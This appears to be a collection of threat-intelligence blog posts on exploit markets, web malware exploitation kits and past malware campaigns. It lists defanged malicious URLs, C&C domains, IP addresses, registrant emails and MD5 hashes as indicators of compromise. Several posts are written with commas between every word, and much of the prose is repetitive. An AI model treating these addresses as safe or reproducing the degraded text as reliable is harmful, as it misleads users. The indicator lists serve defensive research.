Microsoft Releases Its MSRC Researcher Recognition Program Award Winners - An Analysis

Microsoft has recently released its MSRC Researcher Recognition Program Award Winners that basically covers several key areas of vulnerability research categories that are basically targeting a variety of Microsoft-based online platforms products and services where the researchers directly contribute with their knowledge and know-how for the purpose of sharing actionable intelligence and actual PoC (Proof of  Concept) code that's basically capable of exploiting various vulnerabilities in various Microsoft products and services and actually earn a reward.

 

These internal bug-bounty and actual public and private sector including crowd-sourced vulnerability and research based programs actually help Microsoft on its way to secure its products and services while the company publicly offers researcher and contributor recognition which can greatly contribute to a researcher's portfolio of research services and actually help the company secure its products and services.

 

The company is prone to make an additional impact by publicly promoting the MSRC Researcher Recognition Program Award Winners including its active collaboration with TrendMicro's Zero Day Initiative.

 

The more the marrier.

 

Continue reading →

Rogue "Malware Spreading Security Researchers" Launch Malicious Social Engineering Campaign Against Legitimate Researchers - OSINT Analysis

Security researchers from Google have recently spotted and properly analyzed a currently circulation malicious software spreading social engineering driven malicious campaign that's actively interacting with legitimate researchers on social media and private channels for the purpose of tricking them into testing a newly discovered zero day flaw which in reality drops malware on the affected hosts and phones back to a C&C server potentially attempting to compromise the researchers in question.

Sample screenshots of the campaign currently in circulation:

Sample malicious MD5s known to have participated in the campaign:

MD5: 7fc2af97b004836c5452922d4491baaa

MD5: 6252cec30f4fb469aefa2233fe7323f8

MD5: 56018500f73e3f6cf179d3b853c27912

MD5: b52e05683b15c6ad56cebea4a5a54990

MD5: 9e9f69ed56482fff18933c5ec8612063

MD5: f5475608c0126582081e29927424f338

MD5: ae17ce1eb59dd82f38efb9666f279044

Stay tuned!

Continue reading →

Pay-Per-Exploit Acquisition Vulnerability Programs - Pros and cons?

As ZERODIUM starts paying premium rewards to security researchers to acquire their previously unreported zero-day exploits affecting multiple operating systems software and/or devices a logical question emerges in the context of the program's usefulness the potential benefits including potential vulnerabilities within the actual acquisition process - how would the program undermine the security industry and what would be the eventual outcome for the security researcher in terms of fueling growth in the cyber warfare market segment?

In this post I'll discuss the market segment for pay-per-exploit acquisition programs and discuss in-depth the current exploit-acquisition methodology utilized by different vendors and provide in-depth discussion on various over-the-counter acquisition methodologies applied by malicious attackers on their way to monetize access to malware-infected hosts while compromising the confidentiality availability and integrity of the targeted host including an active discussion on the ongoing and potential weaponization of zero day vulnerabilities int the context of today's cyber warfare world.

Having greatly realized the potential of acquiring zero day vulnerabilities for the purpose of actively exploiting end users malicious actors have long been aware of the over-the-counter acquisition market model further enhancing their capabilities when launching malicious campaigns. Among the most widely spread myth about zero day vulnerabilities is the fact that zero day vulnerabilities arethe primary growth factor of the cybercrime ecosystem further resulting in a multi-tude of malicious activity targeting end users.

With vendors continuing to establish the foundations for active vulnerability and exploit acquisition programs third-party vendors and research organizations continue successfully disintermediating the vendor's major vulnerability and exploit acquisition programs successfully resulting in the launch and establishment of third-party services and products further populating the security-industry with related products and services potentially acquiring "know-how" and relevant vulnerability and exploit information from major vendors further launching related companies and services potentially empowering third-party researchers vendors and individuals including nation-state actors with potential weaponization capabilities potentially leading to successful target-acquisition practices on behalf of third-party researchers and individuals.


Becoming a target in the widespread context of third-party vendors and researchers might not be the wisest approach when undermining potential research and in-house research and benchmarking activities in terms of evaluating and responding to vulnerabilities and exploits. Vendors looking for ways to efficiently improve the overall security and product performance in terms of security should consider basic internal benchmarking practices and should also consider a possible incentive-based type of vulnerability and exploit reward-type of revenue-sharing program potentially rewarding company employees and researchers with the necessary tools and incentives to find and discover and report security vulnerabilities and exploits.

Something else worth pointing out in terms of vulnerability research and exploit discovery is a process which can be best described as the life-cycle of a zero day vulnerability and exploit which can be best described as a long-run process utilized by malicious and fraudulent actors successfully utilizing client-side exploits for the purpose of successfully dropping malicious software on the hosts of the targeted victims which often rely on outdated and patched vulnerabilities and the overall misunderstanding that zero day vulnerabilities and exploits are the primary growth factor of the security-industry and will often rely on the fact that end users and enterprises are often unaware of the basic fact that cybercriminals often rely on outdated and patched vulnerabilities successfully targeting thousands of users globally on a daily basis.

What used to be a market-segment dominated by DIY (do-it-yourself) exploit and malware-generating tools is today's modern market-segment dominated by Web malware-exploitation kits successfully affecting thousands of users globally on a daily basis. In terms of Web-malware exploitation kits among the most common misconceptions regarding the utilization of such type of kits is the fact that the cybercriminals behind it rely on newly discovered exploits and vulnerabilities which in fact rely on outdated and already patched security vulnerabilities and exploits for the purposes of successfully enticing thousands of users globally into falling victim into social-engineering driven malicious and fraudulent campaigns.

Despite the evident usefulness from a malicious actor's point of view when launching malicious campaigns malicious actors continue utilizing outdated vulnerabilities for the purpose of launching malicious campaigns further utilizing a multi-tude of social engineering attack vectors to enhance the usefulness of the exploitation vector. Another crucial aspect of the pay-per-exploit acquisition vulnerability model is, the reliance on outdated and unpatchted vulnerabilities for the purpose of launching malicious campaigns further relying on the basic fact that on the majority of occasions end users fail to successfully update their third-party applications often exposing themselves to a variety of successful malicious campaigns utilizing outdated and unpatched vulnerabilities.

We expect to continue observing an increase in the pay-per-exploit acquisition model with, related acquisition model participants continuing to acquire vulnerabilities further fueling growth into the market segment. We expect that malicious actors will adequately respond through over-the-counter acquisition models including the utilization of outdated and unpatched vulnerabilities. End users are advised to continue ensuring that their third-party applications are updated to build a general security awareness and to ensure that they're running a fully patched antivirus solution.

Consider going through the following related posts:
Researchers spot new Web malware exploitation kit
Web malware exploitation kits updated with new Java exploit
Which are the most commonly observed Web exploits in the wild?
Report: Patched vulnerabilities remain prime exploitation vector
Report: malicious PDF files becoming the attack vector of choice
Malvertising campaigns at multiple ad networks lead to Black Hole Exploit Kit
56 percent of enterprise users using vulnerable Adobe Reader plugins
Report: third party programs rather than Microsoft programs responsible for most vulnerabilities
Report: malicious PDF files becoming the attack vector of choice
Malvertising campaigns at multiple ad networks lead to Black Hole Exploit Kit
56 percent of enterprise users using vulnerable Adobe Reader plugins
Report: third party programs rather than Microsoft programs responsible for most vulnerabilities
Report: 64% of all Microsoft vulnerabilities for 2009 mitigated by Least Privilege accounts
Secunia: popular security suites failing to block exploits
37 percent of users browsing the Web with insecure Java versions
Which are the most commonly observed Web exploits in the wild?
Report: Malicious PDF files comprised 80 percent of all exploits for 2009
Secunia: Average insecure program per PC rate remains high

Continue reading →

HIstorical OSINT - Malicious Economies of Scale - The Emergence of Efficient Platforms for Exploitation - 2007

Dear blog readers it's been several years since I last posted a quality update following my 2010 disappearance. As it's been quite a significant period of time since I last posted a quality update I feel it's about time I post an quality update by detailing the Web Malware Exploitation market segment circa 2007 prior to my visit to the GCHQ as an independent contractor with the Honeynet Project.

In this post I'll discuss the rise of Web malware exploitation kits circa 2007 and offer in-depth discussion on the current and emerging tactics techniques and procedures (TTPs) of the cybercriminals behind it. With cybercriminals continuing to actively rely on the exploitation of patched and outdated vulnerabilities and with end users continuing to actively utilize unpatched and outdated third-party software it shouldn't be surprising that today's botnets remain relatively easy to generate and orchestrate for the purpose of committing financial fraud.

Malicious Economies of Scale literally means utilizing attack techniques and exploitation approaches to efficiently, yet cost and time effectively, infect or abuse as many victims as possible, in a combination with an added layer of improved metrics on the success of the campaigns. What are the most popular web exploitation kits that malicious parties use to achieve this? Which are the most popular vulnerabilities used in the majority of the kits? What are the most popular techniques for embedding malware? This white paper will outline this efficiency-centered attack model, and will cover web application vulnerabilities, client-side vulnerabilities, malvertising and black hat SEO (search engine optimization).

An overview of the threats posed by rising number of malware embedded sites, with a discussion of the exploitation techniques and kits used, as well as detailed summaries of all the high-profile such attacks during 2007.

01. Reaching the Efficiency Scale Through a Diverse Set of Exploited Vulnerabilities

2007 was the year in which client-side vulnerabilities significantly replaced server-side ones as the preferred choice of malicious attackers on their way to achieve the highest possible attack success rate, while keeping their investment in terms of know-how and personal efforts to the minimum. Among the most successful such attacks during 2007 was Storm Worm, the perfect example that the use of outdated and already patched vulnerabilities can result in aggregating the world’s largest botnet according to industry and independent researchers’ estimates. By itself, this attack technique is in direct contradiction with the common wisdom that zero day vulnerabilities are more dangerous than already patched ones, however, the gang behind Storm Worm quickly envisioned this biased statement as false, and by standardizing the exploitation process with the help of outdated vulnerabilities achieved an enormous success.

Years ago, whenever, a vulnerability was found and exploit code released in the wild, malicious attackers used to quickly released a do-it-yourself exploitation kit to take advantage of a single exploit only. Nowadays, that’s no longer the case, since by using a single exploit whether an outdated, or zero day one, they’re significantly limiting the probability for a successful attack, and therefore the more diverse and served on-the-fly is the set of exploits used in an attack, the higher would the success rate be.

What was even more interesting to monitor during 2007, was the rise of high-profile sites serving malware, and the decline of malware coming from bogus ones. From the Massive Embedded Malware Attack at a large Italian ISP to the Bank of India, the Syrian Embassy in the U.K, the U.S Consulate in St. Petersburg, China’s CSIRT, Possibility Media’s entire portfolio of E-zines, to the French government’s site related to Lybia, these trusted web sites were all found to serve malware though an embedded link pointing back to the attacker’s malicious server. Let’s clarify what malicious economies of scale means, and how do they do it.

02. What is malicious economies of scale, and how is it achieved?

Malicious economies of scale is a term I coined in 2007 to summarize the ongoing trend of efficiently attacking online users, by standardizing the exploitation process, and by doing so, not just lowering the entry barriers into the process of exploiting a large number of users, but also, maintaining a rather static success rate of infections. Malicious economies of scale is the efficient way by which a large number of end users get infected, or have their online abused, with the malicious parties maintaining a static attack model. It’s perhaps more important to also describe how is the process achieved at the first place? The first strategy applied has to do with common sense in respect to the most popular software applications present at the end user’s end, and the first touch-point in this case would be the end user’s Internet browser.

Having its version easily detected and exploit served, one that’s directly matching the vulnerable version, is among the web exploitation kits main functionalities. Let’s continue with the second strategy, namely to increase the probability of success. As I’ve already pointed out, do-it-yourself single vulnerability exploiting tools matured into web exploitation malware kits, now backed up with a diverse set of exploits targeting different client-side applications, which in this case is the process of increasing the probability of successful infection. The third strategy has to do with attracting the traffic to the malicious server, that as I’ve already discussed is already automatically set to anticipate the upcoming flood of users and serve the malware through exploiting client-side software vulnerabilities on their end. This is mainly done through exploiting remote file inclusion vulnerabilities within the high-profile targets, or through remotely exploitable web application vulnerabilities to basically embed a single line of code, or an obfuscated javascript that when deobfuscated will load the malicious URL in between loading the legitimate site.

Popular Malware Embedded Attack Tactics

This part of the article will briefly describe some of the most common attack tactics malicious parties use to embed links to their malicious servers on either high-profile sites, or any other site with a high pagerank, something they’ve started measuring as of recently according to threat intell assessment on an automated system to embed links based on a site’s popularity.

• The “pull” Approach – Blackhat SEO, Harnessing the Trusted Audience of a Hacked Site

In this tactic, malicious parties entirely rely on the end users to reach their malicious server, compared to the second tactic of “pushing” the malicious links to them. This is primarily accomplished through the use of Blackhat SEO tools generating junk content with the idea to successfully attract search engine traffic for popular queries, thus infecting anyone who visits the site, who often appear within the first twenty search results. The second “pull” approach such tactic is harnessing the already established trust of a site such as major news portal for instance, and by embedding a link to automatically load on the portal, have the users actually “pull” the malware for themselves

• The “push” Approach – Here’s Your Malware Embedded Link

The “push” approach’s success relies in its simple logic, with end users still worrying about downloading or clicking on email attachments given the overall lack of understanding on how to protect from sites serving malware, it’s logical to consider that basically sending a link which once visited will automatically infect the visitor though exploiting a client-side vulnerability, actually works. Storm Worm is the perfect example, and to demonstrate what malicious economies of scale means once again, it’s worth mentioning Storm’s approach of having an already infected host act as an infection vector itself, compared to its authors having to register multiple domains and change them periodically. The result is malware embedded links exploiting client-side vulnerabilities in the form of an IP address, in this case an already infected host that’s now aiming to infect another one

• Automatically Exploiting Web Application Vulnerabilities – Mass SQL Injection Attacks

As I’ve already pointed out, malicious parties are not just efficiently scanning for remotely exploitable web application vulnerabilities or looking for ways to remotely include files on any random host, they’ve started putting efforts into analyzing the page rank, and overall popularity of a site they could exploit. This prioritizing of the sites to be used for a “pull” tactic is aiming to achieve the highest possible success rate by targeting a high-trafficked site, where even though the attack can be detected, the “window of opportunity” while the users were also accessing the malicious server could be far more beneficial than having a permanent malware link on a less popular site for an indefinite period of time.

• Malicious Advertisements - Malvertising

Among the most popular traffic acquisition tactics nowadays remain the active utilization of legitimate Web properties for the purpose of socially engineering an ad network provider into featuring a specific malware-serving advertising at the targeted Web site including active Web site compromise for the purpose of injecting rogue and malicious ads on the targeted host.

Related posts:

• Historical OSINT - Malicious Malvertising Campaign, Spotted at FoxNews, Serves Scareware
• Cybercriminals Launch Malicious Malvertising Campaign, Thousands of Users Affected
• Managed SWF Injection Cybercrime-friendly Service Fuels Growth Within the Malvertising Market Segment

• Buying Access to Hacked Cpanels or Web Servers

Thanks to a vibrant DIY (do-it-yourself) Web malware exploitation kit culture including the active utilization of various DIY Web site exploitation and malware-generating cybercriminals continue actively utilizing stolen and compromised accounting data for the purpose of injecting malicious scripts on the targeted host further compromising the confidentiality availability and integrity of the targeted host.

• Harvesting accounting data from malware infected hosts

Having an administrator access to a domains portfolio, or any type of access though a web application backdoor or direct FTP/SSH, has reached its commercial level a long time ago. In fact, differentiated pricing applies in this case, on the basis of a site’s page rank, whereas I’ve stumbled upon great examples of “underground goods liquidity” as a process, where access to a huge domains portfolio though a hacked Cpanels is being offered for cents with the seller’s main concern that cents are better than nothing, nothing in the sense that she may loose access to the Cpanel before its being sold and thus ends up with nothing. Now, let’s discuss the most popular malware exploitation kits currently in the wild.

The Most Popular Web Malware Exploitation Kits

Going into detail about the most common vulnerabilities used in the multitude of web malware exploitation kits could be irrelevant from the perspective of their current state of “modularity”, that is, once the default installation of the kit contains a rather modest set of exploits, the possibility to add new exploits to be used has long reached the point’n’click stage. Even worse, localizing the kits to different languages further contributes to their easy of use and acceptance on a large scale, just as is their open source nature making it easy for coders to use a successful kit’s modules as a foundation for a new one – something’s that’s happening already, namely the different between a copycat kit and an original coded from scratch one. Among the most popular malware kits remain :

• A Brief Overview of MPack, IcePack, Zunker, Advanced Pack and Fire Pack

During 2007, Mpack emerged as the most popular malware exploitation kit. Originally available for purchase, by the time copies of the kit started leaking out, anyone from a script kiddie to a pragmatic attacker have obtained copy of it. Mpack’s main strength is that of its well configured default installation, which in a combination with a rather modest, but then again, modular set of exploits included, as well as its point’n’click level of sophistication automatically turned it into the default malware kit. Mpack’s malware kit has been widely used on nearly all of the high-profile malware embedded attacks during 2007, however, its popularity resulted in way too much industry attention towards its workings, and therefore, malicious parties starting coming up with new kits, still using Mpack as the foundation at least from a theoretical perspective.

The list is endless, the Nuclear Malware kit, Metaphisher, old version of the WebAttacker and the Rootlauncher kit, with the latest and most advanced innovation named the Random JS Exploitation Kit. Compared to the previous one, this one is going a step beyond the usual centralized malicious server.

With malicious parties now interested in controlling as much infected hosts with as little effort as possible, client-side vulnerabilities will continue to be largely abused in an efficient way thought web malware exploitation kits in 2008. The events that took place during 2007, clearly demonstrate the pragmatic attack approaches malicious parties started applying, namely realizing that an outdated but unpatched on a large scale vulnerability is just as valuable as a zero day one. Continue reading →

Historical OSINT - Hundreds of Bogus Bebo Accounts Serving Malware

It's 2010 and I've recently intercepted a wide-spread Bebo malicious malware-serving campaign successfully enticing users into interacting with the fraudulent and malicious content potentially compromising the confidentiality availability and integrity of the targeted host to a multi-tude of malicious software.

Sample malicious domains known to have participated in the campaign:
hxxp://boss.gozbest.net/xd.html - 216.32.83.110
hxxp://tafficbots.com/in.cgi?6
hxxp://bolapaqir.com/in.cgi?2
hxxp://mybig-porn.com/promo4/?aid=1339

We'll continue monitoring the campaign and post updates as soon as new developments take place. Continue reading →

Historical OSINT - Chinese Government Sites Serving Malware

It's 2008 and I'm stumbling upon yet another decent portfolio of compromised malware-serving Chinese government Web sites. In this post I'll discuss in-depth the campaign and provide actionable intelligence on the infrastructure behind it.

Compromised Chinese government Web site:
hxxp://nynews.gov.cn

Sample malicious domains known to have participated in the campaign:
hxxp://game1983.com/index.htm
hxxp://sp.070808.net/23.htm
hxxp://higain-hitech.com/mm/index.html

Currently affected Chinese government Web sites:
hxxp://www.tgei.gov.cn/dom.txt - iframe - hxxp://www.b110b.com/chbr/110.htm?id=884191
hxxp://hfinvest.gov.cn/en/aboutus/index.asp - iframe - hxxp://nnbzc12.kki.cn/indax.htm
hxxp://www.whkx.gov.cn/iii.txt - iframe - hxxp://user.free2.77169.net/shmilyzhutou/evil.htm
hxxp://xc.haqi.gov.cn/jay.htm - iframe - hxxp://xc.haqi.gov.cn/jay.htm - hxxp://qqnw.gov.cn/ST.htm
hxxp://www.whkx.gov.cn/mohajem.txt - iframe - hxxp://user.free2.77169.net/shmilyzhutou/evil.htm
hxxp://www.whkx.gov.cn/iii.txt - iframe - hxxp://user.free2.77169.net/shmilyzhutou/evil.htm

We'll continue monitoring the campaign and post updates as soon as new developments take place. Continue reading →

Historical OSINT - Gumblar Botnet Infects Thousands of Sites Serves Adobe Flash Exploits

According to security researchers the Gumblar botnet is making a comeback successfully affecting thousands of users globally potentially compromising the confidentiality availability and integrity of the targeted host to a multi-tude of malicious client-side exploits serving domains further dropping malicious software on the affected hosts.

In this post we'll provide actionable intelligence on the infrastructure behind it and discuss in-depth the tactics techniques and procedures of the cybercriminals behind it.

Malicious URLs known to have participated in the campaign:
hxxp://ncenterpanel.cn/php/unv3.php
hxxp://ncenterpanel.cn/php/p31.php

Related malicious MD5s known to have participated in the campaign:
MD5: 3f5b905c86d4dcaab9c86eddff1e02c7

MD5: 61461d9c9c1954193e5e0d4148a81a0c
MD5: 65cd1da3d4cc0616b4a0d4a862a865a6
MD5: 7de29e5e10adc5d90296785c89aeabce

Sample URL redirection chain:
hxxp://gumblar.cn/rss/?id - 71.6.202.216 - Email: cuitiankai@googlemail.comi
hxxp://gumblar.cn/rss/?id=2
hxxp://gumblar.cn/rss/?id=3

Related malicious domains known to have participated in the campaign:
hxxp://martuz.cn - 95.129.145.58

With Gumblar making a come-back it's becoming evident that cybercriminals continuing utilizing the usual set of malicious and fraudulent tactics for the purpose of spreading malicious software and affecting hundreds of thousands of legitimate Web sites in a cost-effective and efficient way.

We'll continue monitoring the campaign and post updates and post updates as soon as new developments take place. Continue reading →

Historical OSINT - iPowerWeb Hacked Hundreds of Web Sites Affected

In 2008 it became evident that a widespread malware-embedded attack took place successfully affecting hundreds of iPowerWeb customers potentially exposing hundreds of legitimate Web sites to a multi-tude of malicious software courtesy of a well known Russian Business Network's hosting provider - HostFresh.

In this post we'll profile the campaign provide actionable intelligence on the infrastructure behind it and discuss in-depth the tactics techniques and procedures of the cybercriminals behind it. We'll also establish a direct connection between the campaign's infrastructure and the Russian Business Network.

Malicious URL: hxxp://58.65.232.33/gpack/index.php

Related malicious URls known to have participated in the campaign - hxxp://58.65.232.25/counter/getexe.php?h=11 hxxp://58.65.232.25/counter/getfile.php?f=pdf

We'll continue monitoring the campaign and post updates as soon as new developments take place. Continue reading →

Historical OSINT - A Portfolio of Exploits Serving Domains

With, the, rise, of, Web, malware, exploitation, kits, continuing, to, proliferate, cybercriminals, are, poised, to, continue, earning, fraudulent, revenue, in, the, process, of, monetizing, access, to, malware-infected, hosts, largely, relying, on, the, active,y utilization, of, client-side, exploits, further, spreaing, malicious, software, potentially, compromising, the, confidentiality, availability, and, integrity, of, the, targeted, host, to, a, multi-tude, of, malicious, software.

What, used, to, be, an, ecosystem, dominated, by, proprietary, DIY (do-it-yourself) malware and exploits, generating, tools, is, today's, modern, cybercrime, ecosystem, dominated, by, Web, malware, exploitation, kits, successfully, empowering, novice, cybercriminals, with, the, necessary, tactics, techniques, and, procedures, for, the, purpose, of, launching, a, fraudulent, and, malicious, campaign, potentially, affecting, hundreds, of, thousands, of, users, globally.

In, this, post, we'll, provide, actionable, intelligence, on, currently, active, IcePack, Web, malware, exploitation, kit, client-side, and, malware-exploits, serving, domains.

Related IcePack Web Malware Exploitation Kit domains:
hxxp://seateremok.com/xc/index.php
hxxp://lskdfjlerjvm.com/ice-pack/index.php  
hxxp://formidleren.dk/domain/mere.asp  
hxxp://webs-money.info/ice-pack/index.php  
hxxp://seateremok.com/xc/index.php
hxxp://greeetthh.com/ice-pack1/index.php
hxxp://58.65.235.153/~pozitive/ice/index.php
hxxp://iframe911.com/troy/us/sp/ice/index.php
hxxp://themusicmp3.info/rmpanfr/index.php

Related, malicious, MD5s, known, to, have, phoned, back, to, the, same, malicious, C&C, server, IPs (lskdfjlerjvm.com):
MD5: 4c0958f2f9f5ff2e5ac47e92d4006452
MD5: d955372c7ef939502c43a71ff1a9f76e
MD5: 118e24ea884d375dc9f63c986a15e5df
MD5: e825a7e975a9817441da9ba1054a3e6f
MD5: 71460d4a1c7c18ec672fed56d764ebe6

Once, executed, a, sample, malware (MD5: d955372c7ef939502c43a71ff1a9f76e), phones, back, to, the, following, malicious, C&C, server, IPs:
hxxp://riddenstorm.net - 208.100.26.234
hxxp://lordofthepings.ru - 109.70.26.37
hxxp://tableshown.net - 208.100.26.234
hxxp://leadshown.net
hxxp://tablefood.ru
hxxp://tablefood.net - 180.210.34.47
hxxp://leadfood.net
hxxp://tablemeet.net
hxxp://leadmeet.net
hxxp://pointneck.net
hxxp://pointshown.net
hxxp://callshown.net - 212.61.180.100
hxxp://callneck.ru
hxxp://callneck.net
hxxp://ringshown.ru
hxxp://ringshown.net
hxxp://noneshown.net

We'll, continue, monitoring, the, campaigns, and, post, updates, as, soon, as, new, developments, take, place. Continue reading →

Historical OSINT - Hundreds of Malicious Web Sites Serve Client-Side Exploits, Lead to Rogue YouTube Video Players

In, a, cybercrime, ecosystem, dominated, by, hundreds, of, malicious, software, releases, cybercriminals, continue, actively, populating, a, botnet's, infected, population, further, spreading, malicious, software, potentially, compromising, the, confidentiality, integrity, and, availability, of, the, affected, hosts, potentially, exposing, the, affected, user, to, a, multi-tude, of, malicious, software, further, earning, fraudulent, revenue, in, the, process, of, monetizing, the, access, to, the, malware-infected, hosts, largely, relying, on, the, use, of, affiliate-network, based, type, of, fraudulent, revenue, monetization, scheme.

We've, recently, intercepted, a, currently, circulating, malicious, spam, campaign, enticing, users, into, clicking, on, bogus, and, rogue, links, potentially, exposing, the, confidentiality, integrity, and, availability, of, the, affected, hosts, ultimately, attempting, to, socially, engineer, users, into, interacting, with, rogue, YouTube, Video, Players, ultimately, dropping, fake, security, software, also, known, as, scareware, on, the, affected, hosts, with, the, cybercriminals, behind, the, campaign, actively, earning, fraudulent, revenue, largely, relying, on, the, utilization, of, an, affiliate-network, based, type, of, monetization, scheme.

In, this, post, we'll, profile, the, campaign, provide, actionable, intelligence, on, the, infrastructure, behind, it, and, discuss, in-depth, the, tactics, techniques, and, procedures, of, the, cybercriminals, behind, it.

Sample, URL, redirection, chain:
hxxp://acquaintive.in/x.html - 208.87.35.103
    - hxxp://xxxvideo-hlyl.cz.cc/video7/?afid=24 - 63.223.117.10
            - hxxp://binarymode.in/topic/j.php - 159.148.117.21 - Email: enquepuedo.senior@gmail.com
                - hxxp://binarymode.in/topic/exe.php?x=jjar
                    - hxxp://binarymode.in/topic/?showtopic=ecard&bid=151&e=post&done=image

Related, malicious, MD5s, known, to, have, responded, to, the, same, C&C, server, IPs (208.87.35.103):
MD5: a12c055f201841f4640084a70b34c0c4
MD5: b4d435f15d094289839eac6228088baf
MD5: 2782220da587427b981f07dc3e3e0d96
MD5: 1151cd39495c295975b8c85bd4b385e5
MD5: 2539d5d836f058afbbf03cb24e41970c

Once, executed, a, sample, malware (MD5: a12c055f201841f4640084a70b34c0c4), phones, back, to, the, following, C&C, server, IPs:
hxxp://926garage.com - 185.28.193.192
hxxp://quistsolutions.eu - 188.165.239.53
hxxp://rehabilitacion-de-drogas.org - 188.240.1.110
hxxp://bcbrownmusic.com - 69.89.21.66
hxxp://andzi0l.5v.pl - 46.41.150.7
hxxp://alsaei.com - 192.186.194.133

Once, executed, a, sample, malware (MD5: 2782220da587427b981f07dc3e3e0d96), phones, back, to, the, following, C&C, server, IPs:
hxxp://lafyeri.com
hxxp://kulppasur.com - 209.222.14.3
hxxp://toalladepapel.com.ar - 184.168.57.1
hxxp://www.ecole-saint-simon.net - 208.87.35.103

Once, executed, a, sample, malware (MD5: 2539d5d836f058afbbf03cb24e41970c), phones, back, to, the, following, C&C, server, IPs:
hxxp://realquickmedia.com (208.87.35.103)

Related, malicious, domains, known, to, have, responded, to, the, same, malicious, C&C, server, IPs (109.74.195.149):
hxxp://trustidsoftware.com
hxxp://tc28q8cxl2a5ljwa60skl87w6.cdx1cdx1cdx1.in
hxxp://golubu6ka.com
hxxp://cdx2cdx2cdx2.in
hxxp://redmewire.com
hxxp://5zw3t6jq8fiv9jtdqg23.cdx2cdx2cdx2.in
hxxp://es3iz6lb0pet3ix6la0p.cdx2cdx2cdx2.in
hxxp://qsd79bd0j8f7c90e057a.cdx1cdx1cdx1.in
hxxp://w8ncqpet2hx5kf9mbr1a.cdx1cdx1cdx1.in
hxxp://skygaran4ik.com
hxxp://5xj7wk9amqcpse2ug4ve.cdx1cdx1cdx1.in
hxxp://readrelay.com
hxxp://bk5sbm7xgo6vk0e6b3xc.cdx1cdx1cdx1.in
hxxp://d51f1qam8wi15wpxmtjq.cdx2cdx2cdx2.in
hxxp://wxvtsr98642pomligfed.cdx2cdx2cdx2.in
hxxp://zonkjhgebawzvsq09753.cdx1cdx1cdx1.in
hxxp://nightphantom.com

Related, malicious, MD5s, known, to, have, phoned, back, to, the, same, malicious, C&C, server, IPs (109.74.195.149):
MD5: a6c06a59da36ee1ae96ffaff37d12f28
MD5: 2d1bb6ca54f4c093282ea30e2096af0f
MD5: adf037ecbd4e7af573ddeb7794b61c40
MD5: ce7d4a493fc4b3c912703f084d0d61e1
MD5: c36941693eeef3fa54ca486044c6085a

Once, executed, a, sample, malware (MD5:a6c06a59da36ee1ae96ffaff37d12f28), phones, back, to, the, following, malicious, C&C, server, IPs:
hxxp://replost.com - 109.74.195.149
hxxp://zeplost.com - 109.74.195.149

Once, executed, a, sample, malware (MD5:2d1bb6ca54f4c093282ea30e2096af0f), phones, back, to, the, following, malicious, C&C, server, IPs:
hxxp://qweplost.com - 109.74.195.149

Related, malicious, domains, known, to, have, responded, to, the, same, malicious, C&C, server, IPs (96.126.106.156):
hxxp://checkwebspeed.net
hxxp://gercourses.com
hxxp://replost.com
hxxp://boltoflexaria.in
hxxp://levartnetcom.net
hxxp://boltoflex.in
hxxp://borderspot.net
hxxp://diathbsp.in
hxxp://ganzagroup.in
hxxp://httpsstarss.in
hxxp://missingsync.net
hxxp://qqplot.com
hxxp://evelice.in
hxxp://gotheapples.com
hxxp://surfacechicago.net
hxxp://zeplost.com

Related, malicious, MD5s, known, to, have, phoned, back, to, the, same, malicious, C&C, server, IPs:
MD5: 0183a687365cc3eb97bb5c2710952f95
MD5: f1e3030a83fa2f14f271612a4de914cb
MD5: 97269450de58ef5fb8d449008e550bf0
MD5: c83962659f6773b729aa222bd5b03f2f
MD5: e0aa08d4d98c3430204c1bb6f4c980e1

Once, executed, a, sample, malware (MD5:0183a687365cc3eb97bb5c2710952f95), phones, back, to, the, following, malicious, C&C, server, IPs:
hxxp://replost.com - 96.126.106.156

Once, executed, a, sample, malware (MD5:f1e3030a83fa2f14f271612a4de914cb), phones, back, to, the, following, malicious, C&C, server, IPs:
hxxp://gercourses.com/borders.php

Once, executed, a, sample, malware (MD5:97269450de58ef5fb8d449008e550bf0), phones, back, to, the, following, malicious, C&C, server, IPs:
hxxp://checkwebspeed.net - 96.126.106.156

Once, executed, a, sample, malware (MD5:c83962659f6773b729aa222bd5b03f2f), phones, back, to, the, following, malicious, C&C, server, IPs:
hxxp://checkwebspeed.net - 96.126.106.156

Once, executed, a, sample, malware (MD5:e0aa08d4d98c3430204c1bb6f4c980e1), phones, back, to, the, following, malicious, C&C, server, IPs:
hxxp://replost.com - 96.126.106.156

We'll, continue, monitoring, the, campaign, and, post, updates, as, soon, as, new, developments, take, place. Continue reading →

Historical OSINT - Zeus and Client-Side Exploit Serving Facebook Phishing Campaign Spotted in the Wild

In, a, cybercrime, ecosystem, dominated, by, fraudulent, propositions, cybercrimianals, continue, actively, populating, their, botnet's, infected, population, with, hundreds, of, thousands, of, newly, affected, users, globally, potentially, compromising, the, confidentiality, integrity, and, availability, of, the, affected, hosts, to, a, multi-tude, of, malicious, software, further, earning, fraudulent, revenue, in, the, process, of, monetizing, the, affected, botnet's, population, largely, relying, on, the, utilization, of, affiliate-based, type, of, fraudulent, revenue, monetization, scheme.

We've, recently, intercepted, a, currently, circulating, malicious, spam, campaign, impersonating, Facebook, for, the, purpose, of, serving, client-side, exploits, to, socially, engineered, users, further, compromising, the, confidentiality, integrity, and, availability, of, the, affected, hosts, to, a, multi-tude, of, malicious, software, further, earning, fraudulent, revenue, in, the, process, of, monetizing, the, affected, hosts, largely, relying, on, the, use, of, affiliate-based, type, of, fraudulent, revenue, monetizing, scheme.

In, this, post, we'll, profile, the, campaign, provide, actionable, intelligence, on, the, infrastructure, behind it, discuss, in-depth, the, tactics, techniques, and, procedures, of, the, cybercriminals, behind, it, and, provide, actionable, intelligence, on, the, infrastructure, behind, it.

Sample, URL, exploitation, chain:
hxxp://auth.facebook.com.megavids.org/id735rp/LoginFacebook.php
    - hxxp://wqdfr.salefale.com/index.php - 62.193.127.197
        - hxxp://spain.salefale.com/index.php

Related, malicious, domains, known, to, have, participated, in, the, campaign:
hxxp://salefale.com - 112.137.165.114
    - hxxp://countrtds.ru - 91.201.196.102 - Email: thru@freenetbox.ru
       
Sample, detection, rate, for, the, malicious, executable:
MD5: e96c8d23e3b64d79e5e134a9633d6077
MD5: 19d9cc4d9d512e60f61746ef4c741f09

Once, executed, a, sample, malware, phones back to:
hxxp://makotoro.com

Related, malicious, C&C, server, IPs, known, to, have, participated, in, the, campaign:
hxxp://91.201.196.99
hxxp://91.201.196.77
hxxp://91.201.196.101
hxxp://91.201.196.35
hxxp://91.201.196.75
hxxp://91.201.196.76
hxxp://91.201.196.38
hxxp://91.201.196.34
hxxp://91.201.196.37

Related, malicious, C&C, server, IPs (212.175.173.88), known, to, have, participated, in, the, campaign:
hxxp://downloads.fileserversa.org
hxxp://downloads.fileserversc.org
